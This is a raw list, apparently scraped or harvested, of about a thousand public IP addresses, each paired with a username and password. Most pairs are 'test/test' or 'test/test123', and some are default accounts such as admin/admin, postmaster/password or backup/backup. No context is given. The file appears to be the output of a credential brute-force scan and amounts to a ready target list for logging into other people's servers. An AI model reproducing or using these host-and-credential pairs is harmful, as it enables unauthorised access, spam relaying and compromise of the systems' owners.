23.19.117.161,test,test 23.19.117.77,test,test 23.19.124.209,test,test 23.19.124.45,test,test 23.19.117.217,test,test 23.19.124.122,test,test 23.19.124.15,test,test 23.19.117.22,test,test 23.19.124.62,test,test 23.19.243.37,test,test 23.19.0.55,test,test123 23.19.117.6,test,test 23.19.0.209,test,test 23.19.124.212,test,test 23.19.117.225,test,test 23.19.124.96,test,test 23.19.117.14,test,test 23.19.243.248,test,test 23.19.229.7,test,test 23.19.191.228,test,test 23.19.203.234,test,test 23.19.189.110,test,test 23.19.124.146,test,test 23.19.206.150,test,test 23.19.0.130,test,test 23.19.223.20,test,test 23.19.117.93,test,test 23.19.124.139,test,test 23.19.0.42,test,test 23.19.203.181,test,test 23.19.124.155,test,test 23.19.189.123,test,test 23.19.117.234,test,test 23.19.243.8,test,test 23.19.0.210,test,test 23.19.189.71,test,test 23.19.0.193,test,test 23.19.189.70,test,test 23.19.124.108,test,test 23.19.255.186,test,test 23.19.189.90,test,test 23.19.203.15,test,test 23.19.253.102,test,test 23.19.189.41,test,test 23.19.189.75,test,test 23.19.237.20,test,test 23.19.247.42,test,test 23.19.237.63,test,test 23.19.191.179,test,test 23.19.243.63,test,test 23.19.229.60,test,test 23.19.191.18,test,test 23.19.253.168,test,test 23.19.247.114,test,test 23.19.255.226,test,test 23.19.117.103,test,test 23.19.203.25,test,test 23.19.124.9,test,test 23.19.229.195,test,test 23.19.191.171,test,test 23.19.117.20,test,test 23.19.255.45,test,test 23.19.189.32,test,test 23.19.0.31,test,test 23.19.0.96,test,test 23.19.0.128,test,test 23.19.191.234,test,test 23.19.117.219,test,test 23.19.206.109,test,test 23.19.0.127,test,test 23.19.229.56,test,test 23.19.253.131,test,test 23.19.247.88,test,test 23.19.189.10,test,test 23.19.0.46,test,test 23.19.117.124,test,test 23.19.124.26,test,test 23.19.191.36,test,test 23.19.189.96,test,test 23.19.0.88,test,test 23.19.255.227,test,test 23.19.247.127,test,test 23.19.189.31,test,test 23.19.253.218,test,test 23.19.189.98,test,test 23.19.206.123,test,test 23.19.243.183,test,test 23.19.191.103,test,test 23.19.203.189,test,test 23.19.237.80,test,test 23.19.0.21,test,test 23.19.247.243,test,test 23.19.117.42,test,test 23.19.237.51,test,test 23.19.203.148,test,test 23.19.117.171,test,test 23.19.124.246,test,test 23.19.0.58,test,test 23.19.124.76,test,test 23.19.124.169,test,test 23.19.0.71,test,test 23.19.0.174,test,test123 23.19.255.18,test,test 23.19.206.205,test,test 23.19.203.231,test,test 23.19.253.135,test,test 23.19.117.144,test,test 23.19.206.191,test,test 23.19.206.238,test,test 23.19.203.197,test,test 23.19.0.115,test,test 23.19.253.9,test,test 23.19.0.123,test,test123 23.19.203.89,test,test 23.19.117.31,test,test 23.19.203.232,test,test 23.19.124.168,test,test 23.19.124.25,test,test 23.19.117.216,test,test 23.19.117.220,test,test 23.19.117.186,test,test 23.19.124.166,test,test 23.19.124.6,test,test123 23.19.206.157,test,test 23.19.189.82,test,test 23.19.255.42,test,test 23.19.243.47,test,test 23.19.247.83,test,test 23.19.189.140,test,test 23.19.189.24,test,test 23.19.191.97,test,test 23.19.253.54,test,test 23.19.237.64,test,test 23.19.203.162,test,test 23.19.237.18,test,test 23.19.229.80,test,test 23.19.191.190,test,test 23.19.191.41,test,test 23.19.189.100,test,test 23.19.191.220,test,test 23.19.189.168,test,test 23.19.191.188,test,test 23.19.191.55,test,test 23.19.191.238,test,test 23.19.191.35,test,test 23.19.189.74,test,test 23.19.203.201,test,test 23.19.117.250,test,test 23.19.117.72,test,test 23.19.255.221,test,test 23.19.189.241,test,test 23.19.223.140,test,test 23.19.0.234,test,test 23.19.255.37,test,test 23.19.124.214,test,test 23.19.124.173,test,test 23.19.255.90,test,test 23.19.229.107,test,test 23.19.255.58,test,test 23.19.223.52,test,test 23.19.124.125,test,test 23.19.206.60,test,test 23.19.117.62,test,test 23.19.117.137,test,test 23.19.255.200,test,test 23.19.117.78,test,test 23.19.191.123,test,test 23.19.191.22,test,test 23.19.117.198,test,test 23.19.247.36,test,test 23.19.117.57,test,test 23.19.253.58,test,test 23.19.255.40,test,test 23.19.117.68,test,test123 23.19.255.124,test,test 23.19.229.8,test,test 23.19.124.71,test,test123 23.19.191.136,test,test 23.19.0.75,test,test 23.19.124.12,test,test 23.19.191.53,test,test 23.19.237.21,test,test 23.19.223.98,test,test 23.19.223.248,test,test 23.19.203.184,test,test 23.19.191.178,test,test 23.19.206.29,test,test 23.19.223.67,test,test 23.19.189.116,test,test 23.19.189.35,test,test 23.19.229.55,test,test 23.19.243.13,test,test 23.19.253.87,test,test 23.19.237.60,test,test 23.19.247.97,test,test 23.19.243.28,test,test 23.19.243.21,test,test 23.19.206.56,test,test 23.19.223.17,test,test 23.19.247.75,test,test 23.19.255.30,test,test 23.19.253.207,test,test 23.19.247.27,test,test 23.19.255.15,test,test 23.19.117.240,test,test 23.19.189.43,test,test 23.19.253.206,test,test 23.19.237.61,test,test 23.19.117.242,test,test 23.19.117.8,test,test 23.19.0.227,test,test 23.19.255.7,test,test 23.19.117.126,test,test 23.19.255.139,test,test 23.19.191.32,test,test 23.19.189.150,test,test 23.19.243.32,test,test 23.19.203.253,test,test 23.19.0.111,test,test 23.19.0.232,test,test 23.19.0.200,test,test 23.19.124.50,test,test 23.19.124.14,test,test 23.19.117.12,test,test 23.19.243.124,test,test 23.19.243.127,test,test 23.19.237.227,test,test 23.19.253.136,test,test 23.19.247.78,test,test 23.19.0.35,test,test 23.19.0.152,test,test 23.19.253.106,test,test 23.19.124.94,test,test 23.19.191.68,test,test 23.19.124.215,test,test 23.19.117.9,test,test 23.19.206.39,test,test 23.19.117.34,test,test 23.19.117.60,test,test 23.19.124.229,test,test 23.19.117.223,test,test 23.19.117.178,test,test 23.19.189.95,test,test 23.19.117.253,test,test 23.19.124.107,test,test 23.19.117.171,test,test 23.19.223.166,test,test 23.19.191.117,test,test 23.19.223.251,test,test 23.19.223.96,test,test 23.19.117.139,test,test 23.19.191.191,test,test 23.19.206.20,test,test 23.19.117.37,test,test 23.19.253.188,test,test 23.19.255.16,test,test 23.19.255.95,test,test 23.19.124.245,test,test 23.19.223.32,test,test 23.19.237.178,test,test 23.19.117.229,test,test 23.19.117.179,test,test 23.19.0.239,test,test 23.19.229.21,test,test 23.19.223.18,test,test 23.19.229.86,test,test 23.19.203.248,test,test 23.19.206.70,test,test 23.19.237.210,test,test 23.19.124.224,test,test 23.19.0.237,test,test 23.19.0.9,test,test 23.19.237.248,test,test 23.19.0.101,test,test 23.19.247.85,test,test 23.19.229.224,test,test 23.19.203.178,test,test 23.19.203.213,test,test 23.19.203.33,test,test 23.19.124.84,test,test 23.19.124.128,test,test 23.19.203.27,test,test 23.19.117.11,test,test123 23.19.124.134,test,test123 23.19.117.75,test,test123 23.19.117.36,test,test123 23.19.117.99,test,test123 23.19.124.78,test,test123 23.19.117.162,test,test123 23.19.117.225,test,test 23.19.124.244,test,test123 23.19.117.141,test,test123 23.19.237.81,test,test 23.19.191.37,test,test 23.19.203.74,test,test 23.19.117.123,test,test 23.19.206.198,test,test 23.19.191.170,test,test 23.19.255.224,test,test 23.19.191.252,test,test 23.19.255.170,test,test 23.19.206.210,test,test 23.19.223.58,test,test 23.19.189.244,test,test 24.207.42.126,test,test 24.207.42.134,test,test 23.19.117.98,test,test 23.19.117.5,test,test123 23.19.124.217,test,test123 23.19.229.5,test,test 23.19.255.57,test,test 23.19.247.221,test,test 23.19.189.69,test,test 23.19.237.243,test,test 23.19.243.30,test,test 23.19.255.56,test,test 23.19.247.170,test,test 23.19.247.94,test,test 23.19.247.44,test,test 23.19.255.148,test,test 23.19.253.89,test,test 23.19.253.91,test,test 23.19.243.17,test,test 23.19.237.206,test,test 23.19.255.126,test,test 23.19.243.67,test,test 23.19.229.62,test,test 23.19.191.192,test,test 23.19.253.128,test,test 23.19.253.8,test,test 23.19.247.74,test,test 23.19.189.46,test,test 23.19.0.105,test,test 23.19.124.200,test,test 23.19.124.22,test,test 23.19.124.77,test,test 23.19.117.6,test,test 23.19.124.96,test,test 23.19.0.244,test,test 23.19.229.53,test,test 23.19.237.175,test,test 23.19.243.6,test,test 23.19.117.51,test,test 23.19.117.246,test,test 23.19.117.149,test,test123 23.19.243.97,test,test 23.19.229.114,test,test 23.19.229.164,test,test 23.19.229.94,test,test 23.19.117.211,test,test 23.19.124.41,test,test 23.19.206.31,test,test 23.19.117.10,test,test 23.19.189.44,test,test 23.19.189.65,test,test 23.19.124.58,test,test123 23.19.117.177,test,test123 23.19.117.164,test,test123 23.19.124.220,test,test123 23.19.124.18,test,test123 23.19.117.163,test,test 23.19.0.77,test,test 23.19.223.94,test,test 23.19.117.19,test,test 23.19.191.147,test,test 23.19.124.119,test,test123 23.19.117.16,test,test123 23.19.117.237,test,test123 23.19.117.247,test,test123 23.19.117.73,test,test123 23.19.117.148,test,test123 23.19.117.130,test,test123 23.19.124.69,test,test123 23.19.124.145,test,test123 23.19.117.167,test,test 23.19.189.191,test,test 23.19.117.25,test,test 23.19.191.20,test,test123 23.19.223.175,test,test 23.19.223.61,test,test 23.19.189.19,test,test 23.19.191.227,test,test 23.19.189.79,test,test 23.19.189.38,test,test 23.19.191.149,test,test 23.19.189.28,test,test 23.19.124.47,test,test 23.19.206.28,test,test 23.19.237.37,test,test 23.19.189.13,test,test 23.19.189.25,test,test 23.19.117.138,test,test 23.19.189.103,test,test 23.19.206.61,test,test 23.19.203.247,test,test 23.19.203.24,test,test 23.19.237.231,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.223.70,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.223.70,test,test 23.19.223.48,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.223.70,test,test 23.19.223.48,test,test 23.19.223.69,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.223.70,test,test 23.19.223.48,test,test 23.19.223.69,test,test 23.19.117.222,test,test 23.19.237.231,test,test 23.19.117.64,test,test 23.19.203.203,test,test 23.19.247.23,test,test 23.19.223.70,test,test 23.19.223.48,test,test 23.19.223.69,test,test 23.19.117.222,test,test 23.19.0.154,test,test 23.19.191.31,test,test123 23.19.229.111,test,test 23.19.191.196,test,test 23.19.223.119,test,test 23.19.124.174,test,test 23.19.189.122,test,test 23.19.189.5,test,test 23.19.0.5,test,test123 23.19.0.108,test,test123 23.19.223.105,test,test 23.19.117.160,test,test 23.19.117.173,test,test123 23.19.189.106,test,test 23.19.0.212,test,test123 23.19.189.20,test,test 23.19.191.144,test,test 23.19.189.117,test,test 23.19.223.203,test,test 23.19.203.226,test,test 23.19.124.16,test,test123 23.19.237.224,test,test 23.19.253.101,test,test 23.19.117.212,test,test 23.19.229.91,test,test 23.19.117.146,test,test123 23.19.117.252,test,test 23.19.117.213,test,test123 23.19.117.206,test,test123 23.19.124.137,test,test123 23.19.117.174,test,test123 23.19.117.251,test,test123 23.19.117.70,test,test123 23.19.247.202,test,test 23.19.247.223,test,test 23.19.243.22,test,test 23.19.189.52,test,test 23.19.223.117,test,test 23.19.191.239,test,test 23.19.191.164,test,test 23.19.117.18,test,test 23.19.189.169,test,test123 23.19.229.221,test,test 23.19.206.63,test,test123 23.19.124.144,test,test123 23.19.117.134,test,test123 23.19.124.182,test,test123 23.19.206.186,test,test 23.19.117.67,test,test 23.19.124.111,test,test 23.19.189.99,test,test 23.19.189.26,test,test 23.19.189.68,test,test 23.19.206.92,test,test 23.19.191.49,test,test123 23.19.189.51,test,test123 23.19.243.107,test,test123 23.19.191.34,test,test123 23.19.206.204,test,test123 23.19.189.30,test,test 23.19.203.11,test,test 23.19.191.91,test,test 23.19.203.146,test,test 23.19.189.229,test,test 23.19.203.179,test,test 23.19.124.204,test,test 23.19.0.146,test,test 23.19.124.127,test,test 23.19.0.166,test,test 23.19.189.21,test,test 23.19.203.31,test,test 23.19.237.155,test,test 23.19.124.92,test,test 23.19.189.247,test,test 23.19.203.122,test,test123 23.19.124.11,test,test123 23.19.189.39,test,test 23.19.189.49,test,test123 23.19.206.26,test,test123 23.19.223.54,test,test 23.19.191.194,test,test 23.19.191.162,test,test 23.19.237.40,test,test 23.19.203.237,test,test 23.19.117.23,test,test 23.19.229.61,test,test 23.19.247.81,test,test 23.19.191.71,test,test 23.19.229.95,test,test 12.177.126.131,test,password 23.19.117.218,test,test 23.19.189.14,test,test 23.19.237.50,test,test 23.19.117.188,test,test 23.19.124.41,test,test 23.19.117.159,test,test 23.19.243.24,test,test 23.19.189.72,test,test 23.19.117.182,test,test 23.19.189.92,test,test 23.19.206.159,test,test 23.19.191.92,test,test 23.19.203.145,test,test 23.19.189.76,test,test123 23.19.189.214,test,test 23.19.191.66,test,test123 23.19.223.102,test,test 23.19.206.120,test,test 23.19.189.23,test,test 23.19.189.37,test,test 23.19.189.89,test,test 23.19.124.228,test,test 23.19.117.55,test,test 23.19.243.43,test,test 23.19.189.27,test,test 23.19.117.58,test,test123 24.156.49.188,test,test 23.19.253.60,test,test 23.19.189.7,test,test 23.19.206.148,test,test123 23.19.189.212,test,test123 23.19.223.68,test,test123 23.19.124.148,test,test 23.19.117.189,test,test 23.19.223.63,test,test 23.19.203.167,test,test 23.19.0.32,test,test 23.19.223.46,test,test 23.19.237.15,test,test 23.19.189.54,test,test123 23.19.206.181,test,test123 23.19.189.94,test,test123 23.19.191.166,test,test123 23.19.189.59,test,test 23.19.117.112,test,test 23.19.206.73,test,test 23.19.191.232,test,test 23.19.189.47,test,test 23.19.206.59,test,test 23.19.191.152,test,test123 23.19.117.135,test,test 23.19.229.75,test,test 23.19.124.36,test,test 23.19.124.28,test,test123 23.19.247.77,test,test 23.19.203.187,test,test 23.19.189.136,test,test 23.19.189.42,test,test123 23.19.191.226,test,test 23.19.117.17,test,test 23.19.191.182,test,test 23.19.203.240,test,test 23.19.203.182,test,test 24.142.13.11,test,test 38.112.115.133,test,test 24.52.170.80,test,test 24.137.73.87,test,test 23.19.117.122,test,test123 24.227.36.70,test,test 24.38.127.118,test,test 23.19.191.158,test,password 23.19.237.221,test,test 23.19.247.64,test,test 23.19.191.168,test,test 23.19.243.125,test,test 23.19.229.105,test,test 23.19.191.157,test,password 23.19.117.168,test,password 23.19.253.245,test,test123 23.19.117.49,test,password 24.204.45.211,test,test 24.227.92.153,test,test 24.38.127.118,test,test 12.233.77.26,test,123456 38.112.2.158,test,test 24.225.5.142,test,test 23.19.124.20,test,password 12.186.58.10,spam,spam 24.52.160.5,test,test 23.19.203.52,test,123456 12.130.162.140,info,info123 12.191.55.82,info,info 12.208.59.164,info,info 12.4.17.14,admin,password 12.41.30.114,admin,admin 12.197.75.82,postmaster,password 38.111.46.20,postmaster,password 8.14.136.133,admin,admin 12.200.44.59,fax,password 38.111.46.21,postmaster,password 12.175.21.33,admin,admin123456 12.200.55.38,postmaster,123456 12.153.32.82,backup,backup 12.196.25.89,webmaster,123456 24.38.17.31,webmaster,password 50.22.5.233,newsletter,newsletter 50.56.52.75,test,test 50.56.81.94,test,test 50.57.24.58,test,test 50.57.73.243,test,test 50.57.87.209,test,test 50.57.92.114,test,test 50.56.80.114,spam,spam123 50.57.129.249,test,test 50.57.112.115,test,test 50.57.149.127,test,test 50.57.141.236,test,password 50.57.73.174,test,password 50.57.87.209,test,123456 50.97.70.241,test,test 50.97.70.243,test,test 50.97.70.237,test,test 50.97.70.247,test,test 50.97.70.240,test,test 50.97.70.246,test,test 50.97.70.235,test,test 50.97.70.238,test,test 50.97.70.236,test,test 50.97.70.252,test,test123 50.97.70.248,test,test123 50.97.70.239,test,test 50.97.70.245,test,test 50.97.70.249,test,test 50.97.70.244,test,test 50.97.70.242,test,password 50.97.70.250,test,test123 50.115.4.2,test,test 50.115.4.214,test,test 50.115.4.153,test,test 50.115.4.125,test,test 50.115.4.229,test,test 50.115.4.167,test,test 50.115.4.232,test,test 50.115.4.149,test,test 50.115.4.111,test,test 50.115.4.109,test,test 50.115.7.26,test,test 50.115.4.134,test,test123 50.115.4.58,test,test 50.115.4.176,test,test 50.115.4.132,test,test 50.115.4.30,test,test 50.115.4.248,test,test 50.115.4.166,test,test 50.115.4.5,test,test 50.115.4.51,test,test 50.115.4.198,test,test 50.115.4.37,test,test 50.115.7.146,test,test 50.115.4.22,test,test 50.115.4.75,test,test 50.115.4.144,test,test 50.115.7.125,test,test 50.115.4.237,test,test 50.115.4.113,test,test 50.115.4.207,test,test 50.115.4.123,test,test 50.115.4.247,test,test 50.115.4.115,test,test 50.115.4.104,test,test 50.115.4.26,test,test 50.115.4.91,test,test 50.115.4.250,test,test 50.115.4.98,test,test 50.115.7.187,test,test 50.115.4.87,test,test 50.115.7.199,test,test 50.115.4.127,test,test 50.115.4.96,test,test123 50.115.4.28,test,test 50.115.4.105,test,test 50.115.4.138,test,test 50.115.7.81,test,test 50.115.7.109,test,test 50.115.7.45,test,test 50.115.7.93,test,test 50.115.4.45,test,test 50.115.4.48,test,test 50.115.7.176,test,test 50.115.4.220,test,test 50.115.4.171,test,test 50.115.4.38,test,test 50.115.7.80,test,test 50.115.4.151,test,test 50.115.4.59,test,test 50.115.7.83,test,test 50.115.4.238,test,test 50.115.4.137,test,test 50.115.4.21,test,test 50.115.7.40,test,test 50.115.4.225,test,test 50.115.7.94,test,test 50.115.7.101,test,test 50.115.7.52,test,test 50.115.7.130,test,test123 50.115.4.158,test,test 50.115.4.194,test,test 50.115.7.225,test,test 50.115.4.61,test,test 50.115.7.140,test,test 50.115.4.146,test,test 50.115.7.10,test,test 50.115.4.209,test,test 50.115.4.82,test,test 50.115.12.8,test,test 50.115.4.95,test,test 50.115.4.10,test,test 50.115.4.9,test,test 50.115.12.137,test,test 50.115.7.100,test,test 50.115.7.102,test,test 50.115.7.51,test,test123 50.115.4.210,test,test 50.115.4.32,test,test 50.115.4.192,test,test 50.115.7.59,test,test 50.115.4.43,test,test123 50.115.4.217,test,test123 50.115.4.126,test,test 50.115.7.145,test,test123 50.115.4.221,test,test123 50.115.4.117,test,test 50.115.4.100,test,test 50.115.4.47,test,test 50.115.7.174,test,test 50.115.7.198,test,test 50.115.4.29,test,test 50.115.4.224,test,test 50.115.7.55,test,test 50.115.7.68,test,test 50.115.4.27,test,password 50.115.4.227,test,test 50.115.12.129,test,test 50.115.7.13,test,test 50.115.4.161,test,test 50.115.4.11,test,test 50.115.4.186,test,test 50.115.4.148,test,test 50.115.4.60,test,test 50.115.7.186,test,test123 50.115.7.134,test,test 50.115.4.189,test,test 50.115.4.99,test,test 50.115.12.57,test,test 50.115.12.67,test,test 50.115.4.57,test,test 50.115.4.112,test,test 50.115.4.193,test,test 50.115.7.123,test,test 50.115.7.116,test,test 50.115.4.174,test,test 50.115.4.116,test,test 50.115.7.244,test,test 50.115.7.104,test,test 50.115.7.246,test,test 50.115.4.54,test,test 50.115.4.40,test,test 50.115.7.24,test,test 50.115.7.28,test,test 50.115.4.182,test,test 50.115.4.3,test,test 50.115.7.2,test,test 50.115.7.220,test,test 50.115.12.34,test,test 50.115.7.15,test,test 50.115.4.102,test,test 50.115.12.33,test,test 50.115.4.181,test,test 50.115.7.98,test,test 50.115.4.85,test,test 50.115.14.116,test,test 50.115.4.17,test,test 50.115.4.52,test,test 50.115.7.156,test,test 50.115.14.10,test,test 50.115.4.80,test,test 50.115.4.114,test,test 50.115.4.195,test,test 50.115.12.16,test,test 50.115.7.159,test,test 50.115.4.74,test,test 50.115.7.170,test,test 50.115.12.131,test,test 50.115.7.213,test,test 50.115.7.217,test,test 50.115.4.150,test,test 50.115.7.32,test,test 50.115.4.18,test,test 50.115.12.201,test,test 50.115.7.9,test,test 50.115.4.249,test,test 50.115.4.31,test,test 50.115.4.156,test,test 50.115.12.243,test,test 50.115.4.107,test,test 50.115.12.68,test,test 50.115.7.62,test,test 50.115.14.207,test,test 50.115.12.209,test,test 50.115.4.253,test,test 50.115.7.251,test,test 50.115.4.236,test,test123 50.115.4.124,test,test 50.115.4.191,test,test 50.115.7.203,test,test 50.115.7.240,test,test 50.115.4.190,test,test 50.115.4.14,test,test 50.115.12.226,test,test 50.115.7.12,test,test 50.115.12.9,test,test 50.115.7.191,test,test 50.115.7.49,test,test 50.115.4.24,test,test 50.115.14.45,test,test 50.115.4.162,test,test 50.115.14.237,test,test123 50.115.12.124,test,test 50.115.12.223,test,test 50.115.14.216,test,test 50.115.7.16,test,test 50.115.4.216,test,test 50.115.7.154,test,test 50.115.14.17,test,test 50.115.7.27,test,test 50.115.14.32,test,test 50.115.4.120,test,test123 50.115.7.5,test,test 50.115.4.67,test,test 50.115.14.175,test,test 50.115.12.179,test,test 50.115.12.214,test,test 50.115.7.57,test,test 50.115.4.200,spam,spam 50.115.12.139,test,test123 50.115.7.132,test,test 50.115.7.33,test,test123 50.115.0.118,test,test 50.115.4.235,test,test 50.115.14.181,test,test 50.115.12.164,test,test123 50.115.7.227,test,test123 50.115.12.69,test,test123 50.115.14.144,test,test123 50.115.12.49,test,test123 50.115.7.69,test,test 50.115.7.115,test,test 50.115.12.167,test,test 50.115.7.196,test,test 50.115.7.185,test,password 50.115.7.107,test,test123 50.115.4.163,test,password 50.115.7.195,test,test123 50.115.14.41,test,test 50.115.12.199,test,test 50.115.7.65,test,test 50.115.12.46,test,test 50.115.4.222,test,test 50.115.12.239,test,test 50.115.4.62,test,test 50.115.7.184,test,test 50.115.7.192,test,test 50.115.12.195,test,test 50.115.7.108,test,test 50.115.7.70,test,test 50.115.14.63,test,test 50.115.7.233,test,test123 50.115.12.144,test,test 50.115.7.38,test,test123 50.115.7.245,test,test 50.115.4.64,test,test 50.115.12.88,test,test 50.115.7.75,test,test 50.115.14.141,test,test 50.115.4.69,test,test 50.115.12.109,test,test 50.115.7.236,test,test 50.115.14.235,test,test 50.115.14.72,test,test 50.115.7.117,test,test 50.115.7.253,test,test 50.115.14.123,test,test 50.115.14.162,test,test123 50.115.7.76,test,test 50.115.12.83,test,test 50.115.14.130,test,test 50.115.7.133,test,test 50.115.14.224,test,test 50.115.4.215,test,password 50.115.14.137,test,test 50.115.7.56,test,test 50.115.7.137,test,test 50.115.7.167,test,test 50.115.12.43,test,test 50.115.7.111,test,test 50.115.12.73,test,test 50.115.14.60,test,test 50.115.4.206,test,123456 50.115.14.238,test,test 50.115.12.147,test,test 50.115.7.248,test,test 50.115.7.42,test,test 50.115.14.127,test,test 50.115.12.136,test,test 50.115.14.79,test,test 50.115.12.169,test,test 50.115.7.74,test,test 50.115.7.222,test,test 50.115.12.126,test,test 50.115.12.171,test,test 50.115.12.212,test,test 50.115.7.158,test,test 50.115.12.20,test,test 50.115.14.11,test,test 50.115.7.229,test,test 50.115.12.90,test,test 50.115.14.38,test,test 50.115.4.81,test,test 50.115.4.15,test,test 50.115.14.155,test,test 50.115.12.175,test,test 50.115.14.83,test,test 50.115.14.64,test,123456 50.115.4.243,test,123456 50.115.12.200,test,test 50.115.12.62,test,test 50.115.12.119,test,test 50.115.14.172,test,test123 50.115.14.158,test,test 50.115.7.147,test,test 50.115.7.11,test,test 50.115.12.176,test,test 50.115.14.193,test,test 50.115.12.193,test,test 50.115.7.88,test,test 50.115.7.121,test,test 50.115.4.128,test,test 50.115.14.47,test,test 50.115.12.108,test,password 50.115.12.36,test,password 50.115.12.23,test,test 50.115.12.10,test,test 50.115.12.174,test,test 50.115.12.219,test,test 50.115.14.223,test,password 50.115.14.139,test,test 50.115.14.61,test,test 50.115.7.39,test,test 50.115.7.6,test,test 50.115.12.80,test,test 50.115.14.187,test,test 50.115.7.177,test,test 50.115.14.136,test,test 50.115.12.51,test,test 50.115.14.179,test,test 50.115.14.40,test,test 50.115.7.194,test,test123 50.115.7.53,test,test123 50.115.14.108,test,test 50.115.14.77,test,test 50.115.14.110,test,test 50.115.12.210,test,test 50.115.12.37,test,test123 50.115.12.160,test,test123 50.115.12.253,test,test 50.115.14.170,test,test 50.115.14.15,test,test 50.115.14.150,test,test 50.115.7.30,test,test123 50.115.14.44,test,test 50.115.7.254,test,password 50.115.12.155,test,test 50.115.4.83,test,test 50.115.12.125,test,test 50.115.12.13,test,test123 50.115.7.128,test,password 50.115.12.246,test,test 50.115.12.213,test,test123 50.115.12.58,test,test 50.115.12.224,test,test 50.115.7.113,test,test123 50.115.4.108,test,test 50.115.12.102,test,test 50.115.14.86,test,test 50.115.4.199,test,test 50.115.14.180,test,test 50.115.12.182,test,test 50.115.7.141,test,test 50.115.7.204,test,test123 50.115.7.54,test,test123 50.115.12.91,test,test 50.115.12.245,test,test 50.115.14.90,test,test 50.115.14.39,test,test 50.115.14.55,test,test 50.115.12.40,test,test123 50.115.12.248,test,password 50.115.14.23,test,test 50.115.12.138,test,test 50.115.4.196,test,test 50.115.12.22,test,test 50.115.14.21,test,test 50.115.12.143,test,test 50.115.14.43,test,test123 50.115.7.14,test,test 50.115.7.188,test,test 50.115.14.12,test,test 50.115.12.30,test,test 50.115.12.14,test,test 50.115.12.247,test,test 50.115.14.201,test,test 50.115.14.9,test,test 50.115.4.211,test,password 50.115.14.22,test,test 50.115.12.240,test,test 50.115.14.57,test,test 50.115.12.151,test,test 50.115.14.76,test,test 50.115.12.140,test,test 50.115.12.114,test,test 50.115.7.173,test,test 50.115.7.179,test,test 50.115.12.180,test,test 50.115.12.233,test,test 50.115.4.140,test,test 50.115.7.114,test,test 50.115.4.165,test,test 50.115.14.13,test,test 50.115.12.78,test,test 50.115.14.84,test,test 50.115.14.75,test,test 50.115.12.121,test,test 50.115.12.3,test,test 50.115.14.243,test,test 50.115.14.121,test,test 50.115.14.85,test,test123 50.115.4.246,test,test123 50.115.14.53,test,test 50.115.12.234,test,test 50.115.7.239,test,test 50.115.14.99,test,test 50.115.14.242,test,test 50.115.7.92,test,test 50.115.4.219,test,test 50.115.14.203,test,test 50.115.14.142,test,test 50.115.7.230,test,test 50.115.14.147,test,test 50.115.4.129,test,test 50.115.12.21,test,test 50.115.12.44,test,password 50.115.12.45,test,test 50.115.12.39,test,test 50.115.12.130,test,test 50.115.14.24,test,test 50.115.12.28,test,test 50.115.14.8,test,test 50.115.12.135,test,test 50.115.14.227,test,test 50.115.14.54,test,test123 50.115.7.120,test,test 50.115.14.46,test,test 50.115.12.97,test,test 50.115.12.17,test,test 50.115.4.139,test,test 50.115.14.112,test,test123 50.115.7.163,test,test123 50.115.12.241,test,test 50.115.12.244,test,test123 50.115.14.254,test,test 50.115.12.96,test,test 50.115.14.217,test,test 50.115.7.97,test,test123 50.115.12.120,test,password 50.115.4.169,test,test 50.115.14.225,test,test 50.115.4.63,test,test123 50.115.12.252,test,test 50.115.7.164,test,test 50.115.7.197,test,password 50.115.14.166,test,test 50.115.12.250,test,test 50.115.12.7,test,test 50.115.14.26,test,test 50.115.12.72,test,test 50.115.14.221,test,test 50.115.14.122,test,test 50.115.4.242,test,123456 50.115.7.160,test,test123 50.115.14.209,test,test 50.115.12.93,test,test 50.115.12.197,test,test 50.115.14.222,test,test123 50.115.7.77,test,test 50.115.12.227,test,test123 50.115.12.56,test,test 50.115.14.145,test,test 50.115.12.94,test,test123 50.115.14.215,test,test123 50.115.12.4,test,test 50.115.4.252,test,test 50.115.14.19,test,test 50.115.14.59,test,test 50.115.14.176,test,test 50.115.4.241,test,test 50.115.4.251,test,test 50.115.14.73,test,test 50.115.14.78,test,test 50.115.14.138,test,test 50.115.14.240,test,test 50.115.7.138,test,password 50.115.14.178,test,test 50.115.12.115,test,password 50.115.12.77,test,test 50.115.14.236,test,test 50.115.12.190,test,test 50.115.12.55,test,test123 50.115.12.165,test,test 50.115.12.208,test,test 50.115.7.41,test,test123 50.115.7.67,test,test 50.115.14.80,test,test123 50.115.12.215,test,test123 50.115.14.163,test,test123 50.115.12.154,test,test 50.115.14.48,test,test123 50.115.12.60,test,test123 50.115.14.94,test,test123 50.115.12.254,test,test 50.115.12.61,test,test 50.115.12.31,test,test 50.115.14.239,test,test 50.115.7.136,test,test 50.115.14.34,test,test 50.115.12.187,test,test 50.115.14.31,test,test 50.115.12.15,test,test 50.115.14.198,test,test123 50.115.12.74,test,test123 50.115.7.212,test,password 50.115.7.200,test,test 50.115.12.237,test,test 50.115.14.69,test,test 50.115.4.93,test,test123 50.115.12.235,test,test 50.115.14.33,test,test 50.115.12.81,test,test 50.115.12.181,test,password 50.115.14.58,test,test 50.115.14.197,test,test 50.115.14.149,test,test 50.115.7.144,test,test 50.115.4.79,test,test 50.115.12.132,test,123456 50.115.4.65,test,test 50.115.12.231,test,test 50.115.14.229,test,test123 50.115.12.205,test,test123 50.115.12.236,test,test 50.115.14.245,test,test123 50.115.12.198,test,test123 50.115.12.202,test,test 50.115.12.42,test,test 50.115.14.125,test,password 50.115.12.196,test,test 50.115.4.121,test,test 50.115.4.188,test,test 50.115.12.35,test,test123 50.115.7.79,test,test123 50.115.7.31,test,test123 50.115.12.95,test,password 50.115.14.143,test,password 50.115.4.185,test,test 50.115.14.91,test,test 50.115.14.82,test,test123 50.115.14.234,test,test123 50.115.14.154,test,test 50.115.14.133,test,test 50.115.12.5,test,test 50.115.14.97,test,test 50.115.14.211,test,test 50.115.4.35,test,test123 50.115.4.46,test,password 50.115.12.123,test,test123 50.115.7.250,test,test 50.115.7.8,test,test 50.115.4.244,test,test 50.115.7.243,test,test 50.115.4.7,test,test 50.115.4.228,test,test 50.115.14.114,test,test123 50.115.4.147,test,test 